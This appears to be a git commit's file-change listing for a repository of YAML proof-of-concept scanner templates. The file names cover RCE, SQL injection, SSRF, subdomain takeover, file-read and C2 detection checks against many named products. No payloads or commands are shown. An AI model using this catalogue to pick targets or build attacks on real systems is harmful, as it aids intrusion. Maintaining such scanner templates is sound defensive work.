create mode 100644 poc/other/jolokia-list-8361.yaml
create mode 100644 poc/other/kingsoft-v8-file-read.yaml
create mode 100644 poc/other/kubelet-healthz.yaml
create mode 100644 poc/other/kubelet-pods-8523.yaml
rename poc/other/{landray-oa-fileread-8570.yaml => landray-oa-fileread-8571.yaml} (100%)
create mode 100644 poc/other/liveview-axis-camera-8648.yaml
delete mode 100644 poc/other/lockself-panel.yaml
delete mode 100644 poc/other/lotus-domino-version-8657.yaml
create mode 100644 poc/other/lotus-domino-version.yaml
rename poc/other/{lucee-stack-trace-8669.yaml => lucee-stack-trace-8668.yaml} (100%)
create mode 100644 poc/other/manageengine-adaudit-8730.yaml
delete mode 100644 poc/other/manageengine-apex-helpdesk-8746.yaml
create mode 100644 poc/other/manageengine-apex-helpdesk-8748.yaml
delete mode 100644 poc/other/manageengine-applications-manager-8751.yaml
create mode 100644 poc/other/manageengine-applications-manager-8753.yaml
delete mode 100644 poc/other/manageengine-assetexplorer-8758.yaml
delete mode 100644 poc/other/manageengine-desktop-8763.yaml
create mode 100644 poc/other/manageengine-opmanager-8767.yaml
delete mode 100644 poc/other/manageengine-opmanager-8768.yaml
rename poc/other/{manageengine-servicedesk-8772.yaml => manageengine-servicedesk-8771.yaml} (100%)
delete mode 100644 poc/other/manageengine-supportcenter-8777.yaml
rename poc/other/{get.yaml => match-1.yaml} (100%)
rename poc/other/{matcher-with-or.yaml => matcher-with-and.yaml} (100%)
delete mode 100644 poc/other/meduza-stealer.yaml
create mode 100644 poc/other/metadata-alibaba-8807.yaml
delete mode 100644 poc/other/metadata-azure-8813.yaml
create mode 100644 poc/other/metadata-azure.yaml
create mode 100644 poc/other/metadata-hetzner-8822.yaml
mode change 100644 => 100755 poc/other/metadata-service-alibaba.yaml
delete mode 100644 poc/other/mikrotik-graph-8870.yaml
create mode 100644 poc/other/mikrotik-graph-8871.yaml
create mode 100644 poc/other/mini-start-page-8895.yaml
delete mode 100644 poc/other/mini-start-page-8896.yaml
create mode 100644 poc/other/mobileiron-sentry.yaml
delete mode 100644 poc/other/mobotix-guest-camera-8910.yaml
create mode 100644 poc/other/moodle-workplace-panel.yaml
create mode 100644 poc/other/mx-fingerprint.yaml
create mode 100644 poc/other/mystic-stealer.yaml
create mode 100644 poc/other/nameserver-fingerprint.yaml
delete mode 100644 poc/other/navicat-server-panel.yaml
rename poc/other/{nessus-panel-9020.yaml => nessus-panel-9017.yaml} (100%)
create mode 100644 poc/other/netis-info-leak.yaml
delete mode 100644 poc/other/netscaler-gateway-9052.yaml
create mode 100644 poc/other/nextcloud-install-9084.yaml
delete mode 100644 poc/other/nextcloud-install-9085.yaml
create mode 100644 poc/other/nexus-panel.yaml
delete mode 100644 poc/other/nh-c2.yaml
delete mode 100644 poc/other/ns-asg-file-read-9153.yaml
delete mode 100644 poc/other/ns-asg-file-read.yaml
create mode 100644 poc/other/oki-data-9223.yaml
delete mode 100644 poc/other/oki-data-9226.yaml
create mode 100644 poc/other/okiko-sfiler-portal-9227.yaml
rename poc/other/{okta-panel-9231.yaml => okta-panel-9234.yaml} (100%)
delete mode 100644 poc/other/old-copyright-9237.yaml
create mode 100644 poc/other/oob-param-based-interaction-9252.yaml
delete mode 100644 poc/other/oob-param-based-interaction.yaml
delete mode 100644 poc/other/open-mjpg-streamer-9284.yaml
delete mode 100644 poc/other/open-proxy-internal-9289.yaml
create mode 100644 poc/other/open-proxy-internal-9290.yaml
create mode 100644 poc/other/open-proxy-portscan-9295.yaml
create mode 100644 poc/other/open-virtualization-manager-panel-9328.yaml
create mode 100644 poc/other/openam-workflow.yaml
create mode 100644 poc/other/opensis-workflow-9318.yaml
rename poc/other/{opensis-workflow-9319.yaml => opensis-workflow.yaml} (100%)
delete mode 100644 poc/other/opentouch-multimediaservices-panel.yaml
create mode 100644 poc/other/overseerr-panel.yaml
delete mode 100644 poc/other/pacs-connexion-utilisateur-9425.yaml
create mode 100644 poc/other/pagespeed-global-admin-9433.yaml
delete mode 100644 poc/other/pagespeed-global-admin-9435.yaml
delete mode 100644 poc/other/pahtool-panel.yaml
create mode 100644 poc/other/panabit-panel-9444.yaml
delete mode 100644 poc/other/panabit-panel-9445.yaml
delete mode 100644 poc/other/panasonic-network-management-9447.yaml
create mode 100644 poc/other/panasonic-network-management-9448.yaml
create mode 100644 poc/other/passbolt-panel.yaml
create mode 100644 poc/other/pdi-device-page.yaml
rename poc/other/{pentaho-panel-9483.yaml => pentaho-panel-9481.yaml} (100%)
create mode 100644 poc/other/plausible-panel.yaml
delete mode 100644 poc/other/plesk-obsidian-9594.yaml
rename poc/other/{plesk-onyx-9598.yaml => plesk-onyx-9601.yaml} (100%)
delete mode 100644 poc/other/plesk-stat-9604.yaml
create mode 100644 poc/other/plesk-stat.yaml
create mode 100644 poc/other/plugin.yaml
rename poc/other/{portainer-init-deploy-9630.yaml => portainer-init-deploy.yaml} (100%)
delete mode 100644 poc/other/posteio-admin-panel.yaml
delete mode 100644 poc/other/postmessage-outgoing-tracker-9634.yaml
create mode 100644 poc/other/postmessage-outgoing-tracker.yaml
delete mode 100644 poc/other/powerlogic-ion-9648.yaml
create mode 100644 poc/other/powerlogic-ion-9650.yaml
rename poc/other/{prometheus-exporter-9678.yaml => prometheus-exporter-9677.yaml} (100%)
create mode 100644 poc/other/prometheus-exporter.yaml
create mode 100644 poc/other/prometheus-flags-9687.yaml
delete mode 100644 poc/other/prometheus-flags.yaml
delete mode 100644 poc/other/prometheus-targets-9691.yaml
create mode 100644 poc/other/prototype-pollution-check-9698.yaml
delete mode 100644 poc/other/prototype-pollution-check-9699.yaml
rename poc/other/{provider-path-9702.yaml => provider-path-9701.yaml} (100%)
create mode 100644 poc/other/ptr-fingerprint.yaml
create mode 100644 poc/other/pulse-secure-panel-9712.yaml
rename poc/other/{put-m-enb.yaml => put-method-enabled-9727.yaml} (100%)
delete mode 100644 poc/other/put-method-enabled.yaml
create mode 100644 poc/other/pypicloud-panel-9733.yaml
create mode 100644 poc/other/qdpm-info-leak-9753.yaml
create mode 100644 poc/other/qdpm-info-leak.yaml
rename poc/other/{race-multiple.yaml => race-simple.yaml} (100%)
create mode 100644 poc/other/radius-manager-9794.yaml
delete mode 100644 poc/other/radius-manager-9796.yaml
rename poc/other/{get-override-sni.yaml => raw-get.yaml} (100%)
create mode 100644 poc/other/red-lion-panel.yaml
create mode 100644 poc/other/request-based-interaction-9862.yaml
rename poc/other/{request-based-interaction-9863.yaml => request-based-interaction.yaml} (100%)
delete mode 100644 poc/other/resin-inputfile-fileread-9868.yaml
create mode 100644 poc/other/resin-inputfile-fileread-9870.yaml
create mode 100644 poc/other/resin-viewfile-lfr.yaml
create mode 100644 poc/other/robots-txt-9888.yaml
delete mode 100644 poc/other/robots-txt-9890.yaml
create mode 100644 poc/other/ruijie-eg-filedown.yaml
rename poc/other/{scs-landfill-control-10098.yaml => scs-landfill-control-10097.yaml} (100%)
delete mode 100644 poc/other/securenvoy-panel-10114.yaml
create mode 100644 poc/other/securenvoy-panel-10116.yaml
delete mode 100644 poc/other/securepoint-utm-10117.yaml
create mode 100644 poc/other/securepoint-utm-10118.yaml
delete mode 100644 poc/other/security-10123.yaml
create mode 100644 poc/other/security-10124.yaml
delete mode 100644 poc/other/selea-ip-camera-10136.yaml
create mode 100644 poc/other/selfcheck-panel.yaml
delete mode 100644 poc/other/server-status-localhost-10165.yaml
create mode 100644 poc/other/server-status-localhost-10166.yaml
rename poc/other/{shell-history-10193.yaml => shell-history.yaml} (100%)
delete mode 100644 poc/other/sidekiq-dashboard-10235.yaml
create mode 100644 poc/other/sidekiq-dashboard-10239.yaml
create mode 100644 poc/other/signatures-10268.yaml
delete mode 100644 poc/other/sitemap.yaml
rename poc/other/{skycaiji-admin-panel-10304.yaml => skycaiji-admin-panel-10306.yaml} (100%)
delete mode 100644 poc/other/softether-vpn-panel.yaml
create mode 100644 poc/other/solarwinds-orion-10357.yaml
delete mode 100644 poc/other/solarwinds-orion-10359.yaml
create mode 100644 poc/other/solr-fileread.yaml
create mode 100644 poc/other/solr-query-dashboard-10368.yaml
delete mode 100644 poc/other/solr-query-dashboard.yaml
rename poc/other/{sonarqube-public-projects-10379.yaml => sonarqube-public-projects-10377.yaml} (100%)
rename poc/other/{sonicwall-sslvpn-panel-10390.yaml => sonicwall-sslvpn-panel-10388.yaml} (100%)
create mode 100644 poc/other/sonicwall-sslvpn-shellshock-10395.yaml
create mode 100644 poc/other/sphinxonline-panel.yaml
delete mode 100644 poc/other/spidercontrol-scada-server-info-10413.yaml
delete mode 100644 poc/other/splunk-enterprise-panel-10415.yaml
create mode 100644 poc/other/spoofable-spf-records-ptr-10424.yaml
delete mode 100644 poc/other/spoofable-spf-records-ptr-10425.yaml
delete mode 100644 poc/other/supershell-c2.yaml
delete mode 100644 poc/other/supervpn-panel-10577.yaml
delete mode 100644 poc/other/symantec-messaging-gateway-10610.yaml
create mode 100644 poc/other/symantec-pgp-global-directory-10611.yaml
delete mode 100644 poc/other/synopsys-coverity-panel.yaml
create mode 100644 poc/other/tabnabbing-check-10646.yaml
delete mode 100644 poc/other/teamcity-registration-enabled-10667.yaml
create mode 100644 poc/other/teamcity-registration-enabled.yaml
create mode 100644 poc/other/teamforge-panel.yaml
create mode 100644 poc/other/tekon-info-leak-10685.yaml
delete mode 100644 poc/other/teradici-pcoip.yaml
delete mode 100644 poc/other/terraform-enterprise-panel-10710.yaml
create mode 100644 poc/other/terraform-enterprise-panel-10711.yaml
delete mode 100644 poc/other/thinkcmf-arbitrary-code-execution-10715.yaml
create mode 100644 poc/other/thinkcmf-arbitrary-code-execution.yaml
delete mode 100644 poc/other/thinkcmf_include.yaml
create mode 100644 poc/other/tibco-spotfire-panel.yaml
create mode 100644 poc/other/tigase-xmpp-server.yaml
create mode 100644 poc/other/tileserver-gl.yaml
delete mode 100644 poc/other/tor-socks-proxy-10811.yaml
delete mode 100644 poc/other/traefik-dashboard-10832.yaml
create mode 100644 poc/other/traefik-dashboard-10834.yaml
create mode 100644 poc/other/tuxedo-connected-controller-10852.yaml
delete mode 100644 poc/other/tuxedo-connected-controller-10855.yaml
delete mode 100644 poc/other/upnp-device-10982.yaml
delete mode 100644 poc/other/ups-status-10983.yaml
create mode 100644 poc/other/ups-status-10985.yaml
delete mode 100644 poc/other/veriz0wn-osint.yaml
rename poc/other/{voipmonitor-workflow-11065.yaml => voipmonitor-workflow-11064.yaml} (100%)
delete mode 100644 poc/other/voipmonitor-workflow.yaml
delete mode 100644 poc/other/wallix-accessmanager-panel-11094.yaml
create mode 100644 poc/other/wallix-accessmanager-panel-11095.yaml
delete mode 100644 poc/other/wazuh-panel-11113.yaml
create mode 100644 poc/other/wazuh-panel-11114.yaml
rename poc/other/{wireless-leakage(1).yaml => wireless-leakage.yaml} (100%)
create mode 100644 poc/other/wooyun-2015-148227(1).yaml
delete mode 100644 poc/other/workspace-one-uem-11393.yaml
create mode 100644 poc/other/workspace-one-uem-11394.yaml
delete mode 100644 poc/other/wowza-streaming-engine-11399.yaml
delete mode 100644 poc/other/wso2-2019-0598-11635.yaml
delete mode 100644 poc/other/wso2-management-console-11644.yaml
create mode 100644 poc/other/wso2-management-console-11647.yaml
rename poc/other/{wso2mgmtconsole(1).yaml => wso2mgmtconsole.yaml} (100%)
create mode 100644 poc/other/yarn-lock.yaml
create mode 100644 poc/other/yongyou-eltextfile.yaml
delete mode 100644 poc/other/yopass-panel-11749.yaml
create mode 100644 poc/other/yopass-panel-11750.yaml
create mode 100644 poc/other/zhiyuan-oa-info-leak-11799.yaml
delete mode 100644 poc/other/zhiyuan-oa-info-leak-11800.yaml
create mode 100644 poc/other/zhongkewangwei-fileread.yaml
create mode 100644 poc/other/zuul-panel-11843.yaml
create mode 100644 poc/perl/perl-status-9487.yaml
create mode 100644 poc/php/clockwork-php-page-1016.yaml
rename poc/php/{php-backup-files-9497.yaml => php-backup-files-9498.yaml} (100%)
delete mode 100644 poc/php/php-errors-9511.yaml
delete mode 100644 poc/php/php-errors.yaml
delete mode 100644 poc/php/php-proxy-detect.yaml
create mode 100644 poc/php/php-scanner.yaml
rename poc/php/{php-zerodium-backdoor-rce-9569.yaml => php-zerodium-backdoor-rce-9572.yaml} (100%)
delete mode 100644 poc/php/php-zerodium-backdoor-rce.yaml
create mode 100644 poc/php/phpcollab-detect-9499.yaml
create mode 100644 poc/php/phpcollab-workflow-9502.yaml
delete mode 100644 poc/php/phpcollab-workflow-9503.yaml
delete mode 100644 poc/php/phpinfo-9520.yaml
create mode 100644 poc/php/phpldapadmin-panel.yaml
delete mode 100644 poc/php/phpmyadmin-setup-9531.yaml
create mode 100644 poc/php/phpmyadmin-setup-9532.yaml
delete mode 100644 poc/php/phpmyadmin-sql-9534.yaml
create mode 100644 poc/php/phpunit-9556.yaml
delete mode 100644 poc/php/phpunit.yaml
delete mode 100644 poc/php/thinkphp-2-rce-10740.yaml
delete mode 100644 poc/php/thinkphp-501-rce-10743.yaml
create mode 100644 poc/php/thinkphp-501-rce.yaml
create mode 100644 poc/php/thinkphp-5022-rce-10744.yaml
rename poc/php/{thinkphp-5022-rce.yaml => thinkphp-5022-rce-10747.yaml} (100%)
delete mode 100644 poc/php/thinkphp-5023-rce-10748.yaml
delete mode 100644 poc/php/thinkphp-509-information-disclosure-10755.yaml
create mode 100644 poc/php/twig-php-ssti-10856.yaml
delete mode 100644 poc/php/wp-phpfreechat-xss-11524.yaml
create mode 100644 poc/python/autobahn-python-detect-594.yaml
delete mode 100644 poc/python/autobahn-python-detect-595.yaml
create mode 100644 poc/python/django-admin-panel-7023.yaml
create mode 100644 poc/python/django-debug-exposed-404.yaml
delete mode 100644 poc/python/django-framework-exceptions.yaml
delete mode 100644 poc/python/django-secret-key.yaml
create mode 100644 poc/python/django-secret.key.yaml
delete mode 100644 poc/python/jupyter-ipython-unauth-8402.yaml
delete mode 100644 poc/python/python-metrics.yaml
create mode 100644 poc/python/python-scanner-9748.yaml
delete mode 100644 poc/python/python-scanner.yaml
delete mode 100644 poc/rabbitmq/rabbitmq-dashboard-9776.yaml
create mode 100644 poc/rabbitmq/rabbitmq-dashboard-9779.yaml
create mode 100644 poc/rabbitmq/rabbitmq-default-admin-9780.yaml
delete mode 100644 poc/rabbitmq/rabbitmq-default-admin-9782.yaml
create mode 100644 poc/redis/exposed-redis-7339.yaml
delete mode 100644 poc/remote_code_execution/apache-flink-unauth-rce-355.yaml
delete mode 100644 poc/remote_code_execution/apache-httpd-rce-362.yaml
create mode 100644 poc/remote_code_execution/apache-solr-log4j-rce-372.yaml
delete mode 100644 poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml
create mode 100644 poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml
rename poc/remote_code_execution/{code42-log4j-rce-1131.yaml => code42-log4j-rce.yaml} (100%)
rename poc/remote_code_execution/{core-chuangtian-cloud-rce-1207.yaml => core-chuangtian-cloud-rce-1211.yaml} (100%)
delete mode 100644 poc/remote_code_execution/elex-woocommerce-xss-7199.yaml
create mode 100644 poc/remote_code_execution/elex-woocommerce-xss.yaml
create mode 100644 poc/remote_code_execution/eyou-email-rce-7380.yaml
create mode 100644 poc/remote_code_execution/eyou-email-rce-7382.yaml
delete mode 100644 poc/remote_code_execution/fastjson-1-2-24-rce.yaml
create mode 100644 poc/remote_code_execution/fastjson-1-2-41-rce.yaml
rename poc/remote_code_execution/{fastjson-1-2-42-rce.yaml => fastjson-1-2-42-rce-7408.yaml} (100%)
create mode 100644 poc/remote_code_execution/fastjson-1-2-43-rce-7412.yaml
create mode 100644 poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml
delete mode 100644 poc/remote_code_execution/icewarp-webclient-rce-8133.yaml
create mode 100644 poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml
delete mode 100644 poc/remote_code_execution/jamf-log4j-jndi-rce.yaml
delete mode 100644 poc/remote_code_execution/lotuscms-rce-8650.yaml
create mode 100644 poc/remote_code_execution/lotuscms-rce-8652.yaml
create mode 100644 poc/remote_code_execution/metersphere-plugin-rce.yaml
delete mode 100644 poc/remote_code_execution/mirai-unknown-rce-8899.yaml
delete mode 100644 poc/remote_code_execution/nuuo-nvrmini2-rce-9170.yaml
create mode 100644 poc/remote_code_execution/optilink-ont1gew-gpon-rce-9343.yaml
create mode 100644 poc/remote_code_execution/panabit-sy_addmount-rce.yaml
create mode 100644 poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml
delete mode 100644 poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml
rename poc/remote_code_execution/{phalcon-framework-source.yaml => phalcon-framework-source-9494.yaml} (100%)
delete mode 100644 poc/remote_code_execution/phalcon-framework-source-9496.yaml
rename poc/remote_code_execution/{php-zerodium-backdoor-rce-9569.yaml => php-zerodium-backdoor-rce-9572.yaml} (100%)
delete mode 100644 poc/remote_code_execution/php-zerodium-backdoor-rce.yaml
create mode 100644 poc/remote_code_execution/powercreator-cms-rce-9645.yaml
create mode 100644 poc/remote_code_execution/powercreator-cms-rce.yaml
create mode 100644 poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9758.yaml
create mode 100644 poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml
delete mode 100644 poc/remote_code_execution/salesforce-aura.yaml
create mode 100644 poc/remote_code_execution/sangfor-ba-rce-10020.yaml
create mode 100644 poc/remote_code_execution/seacms-rce-10101.yaml
create mode 100644 poc/remote_code_execution/showdoc-file-upload-rce-10227.yaml
create mode 100644 poc/remote_code_execution/simple-employee-rce-10279.yaml
delete mode 100644 poc/remote_code_execution/simple-employee-rce-10280.yaml
rename poc/remote_code_execution/{spon-ip-rce.yaml => spon-ip-rce(1).yaml} (100%)
create mode 100644 poc/remote_code_execution/sponip-network-system-ping-rce-10421.yaml
rename poc/remote_code_execution/{springboot-h2-db-rce-10457.yaml => springboot-h2-db-rce.yaml} (100%)
delete mode 100644 poc/remote_code_execution/tamronos-rce-10649.yaml
delete mode 100644 poc/remote_code_execution/thinkphp-2-rce-10740.yaml
delete mode 100644 poc/remote_code_execution/thinkphp-501-rce-10743.yaml
create mode 100644 poc/remote_code_execution/thinkphp-501-rce.yaml
create mode 100644 poc/remote_code_execution/thinkphp-5022-rce-10744.yaml
rename poc/remote_code_execution/{thinkphp-5022-rce.yaml => thinkphp-5022-rce-10747.yaml} (100%)
delete mode 100644 poc/remote_code_execution/thinkphp-5023-rce-10748.yaml
create mode 100644 poc/remote_code_execution/vercel-takeover-11000.yaml
delete mode 100644 poc/remote_code_execution/vercel-takeover-11001.yaml
create mode 100644 poc/remote_code_execution/vmware-horizon-log4j-jndi-rce.yaml
delete mode 100644 poc/remote_code_execution/webui-rce-11170.yaml
create mode 100644 poc/remote_code_execution/webui-rce-11174.yaml
delete mode 100644 poc/remote_code_execution/wordpress-woocommerce-listing-11339.yaml
create mode 100644 poc/remote_code_execution/wordpress-woocommerce-listing-11341.yaml
delete mode 100644 poc/remote_code_execution/wordpress-woocommerce-sqli-11345.yaml
create mode 100644 poc/remote_code_execution/wp-force-ssl.yaml
create mode 100644 poc/remote_code_execution/wp-woocommerce-file-download-11620.yaml
delete mode 100644 poc/remote_code_execution/wp-woocommerce-file-download.yaml
create mode 100644 poc/remote_code_execution/yapi-rce-11725.yaml
create mode 100644 poc/ruby/rails-debug-mode-9806.yaml
delete mode 100644 poc/ruby/rails-debug-mode-9807.yaml
delete mode 100644 poc/ruby/rails-secret-token-disclosure-9809.yaml
create mode 100644 poc/ruby/rails-secret-token-disclosure-9810.yaml
delete mode 100644 poc/samba/samba-config-9987.yaml
create mode 100644 poc/samba/samba-config.yaml
delete mode 100644 poc/sap/sap-netweaver-detect-10047.yaml
create mode 100644 poc/sap/sap-netweaver-info-leak-10051.yaml
delete mode 100644 poc/sap/sap-netweaver-info-leak-10052.yaml
delete mode 100644 poc/sap/sap-netweaver-webgui.yaml
delete mode 100644 poc/sap/sap-recon-detect-10063.yaml
delete mode 100644 poc/sap/sap-redirect.yaml
create mode 100644 poc/sap/sap-web-dispatcher-admin-portal-10071.yaml
create mode 100644 poc/sap/sapfiori-panel-10033.yaml
delete mode 100644 poc/sap/sapfiori-panel-10034.yaml
create mode 100644 poc/search/aws-opensearch-login-649.yaml
delete mode 100644 poc/search/aws-opensearch-login-650.yaml
create mode 100644 poc/search/elasticsearch-sql-client-detect-7190.yaml
delete mode 100644 poc/search/searches.yaml
delete mode 100644 poc/sensitive/sensitive-storage-exposure.yaml
delete mode 100644 poc/sensitive/zenphoto-installation-sensitive-info.yaml
create mode 100644 poc/sensitive/zenphoto-sensitive-info-11784.yaml
delete mode 100644 poc/sharepoint/exposed-sharepoint-list-7345.yaml
create mode 100644 poc/shopify/shopify-custom-token(1).yaml
delete mode 100644 poc/shopify/shopify-custom-token-10198.yaml
delete mode 100644 poc/shopify/shopify-private-token-11861.yaml
delete mode 100644 poc/shopify/shopify-takeover-10201.yaml
create mode 100644 poc/smtp/easy-wp-smtp-listing-7156.yaml
delete mode 100644 poc/smtp/easy-wp-smtp-listing-7157.yaml
create mode 100644 poc/smtp/msmtp-config-8967.yaml
create mode 100644 poc/social/flow-flow-social-stream-xss-7524.yaml
delete mode 100644 poc/social/flow-flow-social-stream-xss.yaml
delete mode 100644 poc/social/linkedin-id-11853.yaml
create mode 100644 poc/social/sassy-social-share-10083.yaml
rename poc/social/{sassy-social-share-10087.yaml => sassy-social-share.yaml} (100%)
rename poc/sql/{74cms-sqli-10.yaml => 74cms-sqli.yaml} (100%)
rename poc/sql/{android-debug-database-exposed-316.yaml => android-debug-database-exposed-314.yaml} (100%)
rename poc/sql/{api-abuseipdb-384.yaml => api-abuseipdb-385.yaml} (100%)
create mode 100644 poc/sql/api-abuseipdb.yaml
create mode 100644 poc/sql/buildbot-panel-803.yaml
delete mode 100644 poc/sql/chamilo-lms-sqli-892.yaml
create mode 100644 poc/sql/chamilo-lms-sqli.yaml
create mode 100644 poc/sql/chanjet-crm-sqli.yaml
create mode 100644 poc/sql/couchdb-adminparty-1237.yaml
delete mode 100644 poc/sql/couchdb-exposure-1238.yaml
create mode 100644 poc/sql/couchdb-exposure-1239.yaml
delete mode 100644 poc/sql/db-backup-lfi-6774.yaml
create mode 100644 poc/sql/db-backup-lfi-6775.yaml
create mode 100644 poc/sql/db-schema-6783.yaml
delete mode 100644 poc/sql/dbeaver-credentials-6780.yaml
rename poc/sql/{dedecms-membergroup-sqli.yaml => dedecms-membergroup-sqli-6796.yaml} (100%)
delete mode 100644 poc/sql/dotnetcms-sqli.yaml
create mode 100644 poc/sql/duomicms-sql-injection-7124.yaml
create mode 100644 poc/sql/duomicms-sql-injection.yaml
create mode 100644 poc/sql/ecology-syncuserinfo-sqli.yaml
create mode 100644 poc/sql/elasticsearch-sql-client-detect-7190.yaml
create mode 100644 poc/sql/etouch-v2-sqli-7266.yaml
create mode 100644 poc/sql/exposed-adb-7282.yaml
create mode 100644 poc/sql/glpi-9.3.3-sql-injection.yaml
delete mode 100644 poc/sql/kevinlab-bems-sqli-8457.yaml
create mode 100644 poc/sql/mdb-database-file-8795.yaml
delete mode 100644 poc/sql/mdb-database-file-8796.yaml
create mode 100644 poc/sql/mongodb-detect-8920.yaml
delete mode 100644 poc/sql/mongodb-unauth-8925.yaml
create mode 100644 poc/sql/odoo-database-manager-9204.yaml
delete mode 100644 poc/sql/odoo-database-manager-9205.yaml
delete mode 100644 poc/sql/openerp-database-9275.yaml
create mode 100644 poc/sql/openerp-database-9277.yaml
delete mode 100644 poc/sql/oracle-dbass-detect-9351.yaml
delete mode 100644 poc/sql/oracle-dbass-detect.yaml
delete mode 100644 poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml
create mode 100644 poc/sql/pbootcms-database-file-download-9469.yaml
delete mode 100644 poc/sql/phpmyadmin-sql-9534.yaml
create mode 100644 poc/sql/pikpikcusqli.yaml
create mode 100644 poc/sql/quick-cms-sqli.yaml
create mode 100644 poc/sql/seacms-sqli-10103.yaml
rename poc/sql/{springboot-h2-db-rce-10457.yaml => springboot-h2-db-rce.yaml} (100%)
delete mode 100644 poc/sql/sql-server-reporting-10509.yaml
delete mode 100644 poc/sql/sqli_header-10504.yaml
create mode 100644 poc/sql/suspicious-sql-error-messages.yaml
delete mode 100644 poc/sql/symfony-database-config-10616.yaml
rename poc/sql/{symfony-database-config.yaml => symfony-database-config-10617.yaml} (100%)
rename poc/sql/{thumbs-db-disclosure.yaml => thumbs-db-disclosure-10763.yaml} (100%)
create mode 100644 poc/sql/tidb-unauth-10770.yaml
delete mode 100644 poc/sql/tidb-unauth-10772.yaml
create mode 100644 poc/sql/ucmdb-default-login-10871.yaml
rename poc/sql/{ucmdb-default-login-10869.yaml => ucmdb-default-login.yaml} (100%)
create mode 100644 poc/sql/unauthenticated-influxdb-10903.yaml
create mode 100644 poc/sql/wordpress-db-repair-11252.yaml
delete mode 100644 poc/sql/wordpress-woocommerce-sqli-11345.yaml
delete mode 100644 poc/sql/xdcms-sqli-11664.yaml
create mode 100644 poc/sql/yongyou-jdbcread.yaml
delete mode 100644 poc/sql/zcms-v3-sqli-11773.yaml
rename poc/sql_injection/{74cms-sqli-10.yaml => 74cms-sqli.yaml} (100%)
delete mode 100644 poc/sql_injection/chamilo-lms-sqli-892.yaml
create mode 100644 poc/sql_injection/chamilo-lms-sqli.yaml
create mode 100644 poc/sql_injection/chanjet-crm-sqli.yaml
rename poc/sql_injection/{dedecms-membergroup-sqli.yaml => dedecms-membergroup-sqli-6796.yaml} (100%)
delete mode 100644 poc/sql_injection/dotnetcms-sqli.yaml
create mode 100644 poc/sql_injection/ecology-syncuserinfo-sqli.yaml
create mode 100644 poc/sql_injection/etouch-v2-sqli-7266.yaml
delete mode 100644 poc/sql_injection/kevinlab-bems-sqli-8457.yaml
create mode 100644 poc/sql_injection/quick-cms-sqli.yaml
create mode 100644 poc/sql_injection/seacms-sqli-10103.yaml
create mode 100644 poc/sql_injection/sqli.yaml
delete mode 100644 poc/sql_injection/sqli_header-10504.yaml
delete mode 100644 poc/sql_injection/wordpress-woocommerce-sqli-11345.yaml
delete mode 100644 poc/sql_injection/xdcms-sqli-11664.yaml
delete mode 100644 poc/sql_injection/zcms-v3-sqli-11773.yaml
create mode 100644 poc/ssrf/cloudflare-image-ssrf-1021.yaml
create mode 100644 poc/ssrf/confluence-ssrf-sharelinks-1192.yaml
delete mode 100644 poc/ssrf/confluence-ssrf-sharelinks-1193.yaml
create mode 100644 poc/ssrf/hasura-graphql-ssrf-7905.yaml
delete mode 100644 poc/ssrf/openbmcs-ssrf-9261.yaml
create mode 100644 poc/ssrf/openbmcs-ssrf.yaml
delete mode 100644 poc/ssrf/umbraco-base-ssrf.yaml
rename poc/ssrf/{w3c-total-cache-ssrf-11080.yaml => w3c-total-cache-ssrf-11077.yaml} (100%)
create mode 100644 poc/ssrf/wp-multiple-theme-ssrf-11513.yaml
delete mode 100644 poc/ssrf/yongyou-ssrf-11745.yaml
create mode 100644 poc/ssrf/zimbra-preauth-ssrf.yaml
create mode 100644 poc/subdomain_takeover/aftership-takeover-205.yaml
create mode 100644 poc/subdomain_takeover/agilecrm-takeover-208.yaml
create mode 100644 poc/subdomain_takeover/aha-takeover-216.yaml
rename poc/subdomain_takeover/{airee-takeover-228.yaml => airee-takeover-226.yaml} (100%)
delete mode 100644 poc/subdomain_takeover/anima-takeover-318.yaml
create mode 100644 poc/subdomain_takeover/anima-takeover-319.yaml
delete mode 100644 poc/subdomain_takeover/bigcartel-takeover-727.yaml
create mode 100644 poc/subdomain_takeover/bigcartel-takeover-728.yaml
create mode 100644 poc/subdomain_takeover/bitbucket-takeover-738.yaml
delete mode 100644 poc/subdomain_takeover/bitbucket-takeover-740.yaml
create mode 100644 poc/subdomain_takeover/brightcove-takeover-783.yaml
create mode 100644 poc/subdomain_takeover/brightcove-takeover-784.yaml
delete mode 100644 poc/subdomain_takeover/brightcove-takeover-785.yaml
rename poc/subdomain_takeover/{canny-takeover-857.yaml => canny-takeover-854.yaml} (100%)
create mode 100644 poc/subdomain_takeover/cargo-takeover-867.yaml
delete mode 100644 poc/subdomain_takeover/cargo-takeover-868.yaml
delete mode 100644 poc/subdomain_takeover/cargocollective-takeover-862.yaml
create mode 100644 poc/subdomain_takeover/cargocollective-takeover-863.yaml
create mode 100644 poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml
create mode 100644 poc/subdomain_takeover/flexbe-takeover-7505.yaml
create mode 100644 poc/subdomain_takeover/flywheel-takeover-7525.yaml
delete mode 100644 poc/subdomain_takeover/freshdesk-takeover-7540.yaml
create mode 100644 poc/subdomain_takeover/freshdesk-takeover-7541.yaml
create mode 100644 poc/subdomain_takeover/frontify-takeover-7542.yaml
create mode 100644 poc/subdomain_takeover/gemfury-takeover-7578.yaml
delete mode 100644 poc/subdomain_takeover/getresponse-takeover-7607.yaml
create mode 100644 poc/subdomain_takeover/getresponse-takeover-7609.yaml
create mode 100644 poc/subdomain_takeover/ghost-takeover-7619.yaml
delete mode 100644 poc/subdomain_takeover/ghost-takeover-7621.yaml
create mode 100644 poc/subdomain_takeover/gitbook-takeover-7627.yaml
create mode 100644 poc/subdomain_takeover/hatenablog-takeover-7907.yaml
delete mode 100644 poc/subdomain_takeover/helpjuice-takeover-7925.yaml
create mode 100644 poc/subdomain_takeover/helpjuice-takeover-7926.yaml
create mode 100644 poc/subdomain_takeover/helprace-takeover-7930.yaml
delete mode 100644 poc/subdomain_takeover/helprace-takeover-7932.yaml
create mode 100644 poc/subdomain_takeover/helpscout-takeover-7936.yaml
delete mode 100644 poc/subdomain_takeover/heroku-takeover-7944.yaml
create mode 100644 poc/subdomain_takeover/intercom-takeover-8166.yaml
